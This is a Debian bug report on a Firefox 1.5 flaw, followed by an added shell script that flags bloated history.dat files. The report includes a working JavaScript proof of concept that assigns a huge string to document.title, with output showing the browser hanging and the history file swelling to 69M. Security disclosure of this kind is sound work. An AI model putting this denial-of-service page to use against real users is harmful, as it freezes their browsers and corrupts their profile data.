Package: firefox
Version: 1.4.99+1.5rc3.dfsg-2
Severity: grave
Tags: security
Justification: causes non-serious data loss

http://packetstormsecurity.org/0512-exploits/firefox-1.5-buffer-overflow.txt

My ff did not crash, but it ate a lot of CPU time when I tested a slightly modified version of the JavaScript. An example:

<html><head><title>heh</title><script type="text/javascript">
function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "abcdefg";
    }
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html>

And results:

[EMAIL PROTECTED] ~] time firefox
Killed

real    38m3.425s
user    24m17.871s
sys     9m31.933s
[EMAIL PROTECTED] ~] cd .mozilla/firefox/5p0odewe.default/
[EMAIL PROTECTED] 5p0odewe.default] ls -lh history.dat
-rw-r--r-- 1 rekcahx rekcahx 69M Dec 8 15:24 history.dat
[EMAIL PROTECTED] 5p0odewe.default] grep http history.dat |wc -l
1
[EMAIL PROTECTED] 5p0odewe.default] wc -l history.dat
876764 history.dat

I removed history.dat and ff started up normally.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.11.2-aino
Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages firefox depends on:
ii  debianutils     2.15.1           Miscellaneous utilities specific t
ii  fontconfig      2.3.2-1.1        generic font configuration library
ii  libatk1.0-0     1.10.3-1         The ATK accessibility toolkit
hi  libc6           2.3.5-6          GNU C Library: Shared libraries an
ii  libcairo2       1.0.2-3          The Cairo 2D vector graphics libra
ii  libfontconfig1  2.3.2-1.1        generic font configuration library
ii  libfreetype6    2.1.10-1         FreeType 2 font engine, shared lib
ii  libgcc1         1:4.0.2-5        GCC support library
ii  libglib2.0-0    2.8.4-2          The GLib library of C routines
ii  libgtk2.0-0     2.6.10-2         The GTK+ graphical user interface
ii  libidl0         0.8.5-1          library for parsing CORBA IDL file
ii  libjpeg62       6b-10            The Independent JPEG Group's JPEG
ii  libpango1.0-0   1.8.2-3          Layout and rendering of internatio
ii  libpng12-0      1.2.8rel-5       PNG library - runtime
ii  libstdc++6      4.0.2-5          The GNU Standard C++ Library v3
ii  libx11-6        6.8.2.dfsg.1-11  X Window System protocol client li
ii  libxext6        6.8.2.dfsg.1-11  X Window System miscellaneous exte
ii  libxft2         2.1.7-1          FreeType-based font drawing librar
ii  libxinerama1    6.8.2.dfsg.1-11  X Window System multi-head display
ii  libxp6          6.8.2.dfsg.1-11  X Window System printing extension
ii  libxt6          6.8.2.dfsg.1-11  X Toolkit Intrinsics
ii  psmisc          21.8-1           Utilities that use the proc filesy
ii  xlibs           6.8.2.dfsg.1-11  X Window System client libraries m
ii  zlib1g          1:1.2.3-8        compression library - runtime

firefox recommends no packages.

-- no debconf information
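
A triage helper for the symptom reported above, added here as an example and not part of the original report: it repeats the reporter's size, line and URL counts for each profile's history.dat and flags files that are large yet hold few URL lines. The thresholds, the function names and the example.invalid sample data are assumptions made for illustration.

```shell
#!/bin/sh
# Triage helper (added example): flag history.dat files that are very
# large but hold few URL lines, the pattern shown in the report.
# Both thresholds are assumptions chosen for illustration; override via env.
MAX_BYTES=${MAX_BYTES:-10485760}               # 10 MiB
MAX_BYTES_PER_URL=${MAX_BYTES_PER_URL:-65536}  # 64 KiB per "http" line

# Prints "<file> size=<bytes> lines=<n> urls=<n> <verdict>".
# Returns 0 if suspicious, 1 if it looks normal, 2 if the file is missing.
check_history_dat() {
    f=$1
    [ -f "$f" ] || return 2
    size=$(wc -c < "$f" | tr -d ' ')
    lines=$(wc -l < "$f" | tr -d ' ')
    urls=$(grep -c http "$f" || true)   # same count as: grep http | wc -l
    verdict=ok
    if [ "$size" -gt "$MAX_BYTES" ]; then
        # No URL lines at all, or too many bytes per URL line, means bloat.
        if [ "${urls:-0}" -eq 0 ] || [ $((size / urls)) -gt "$MAX_BYTES_PER_URL" ]; then
            verdict=SUSPICIOUS
        fi
    fi
    echo "$f size=$size lines=$lines urls=$urls $verdict"
    [ "$verdict" = SUSPICIOUS ]
}

# Check every profile under a base directory such as ~/.mozilla/firefox.
# Returns 0 if at least one suspicious file was found.
scan_profiles() {
    found=1
    for f in "$1"/*/history.dat; do
        if check_history_dat "$f"; then found=0; fi
    done
    return $found
}

# Constructed sample: one URL line followed by 20000 filler lines.
make_bloated_sample() {
    echo "http://example.invalid/" > "$1"
    i=0
    while [ $i -lt 20000 ]; do echo "abcdefgabcdefgabcdefg"; i=$((i + 1)); done >> "$1"
}

# Usage: sh this-script ~/.mozilla/firefox
if [ "$#" -gt 0 ]; then scan_profiles "$1" || true; fi
```

Run against the reporter's numbers (69M, one http line), the default thresholds would mark the file SUSPICIOUS; moving a flagged history.dat aside matches the workaround the reporter describes.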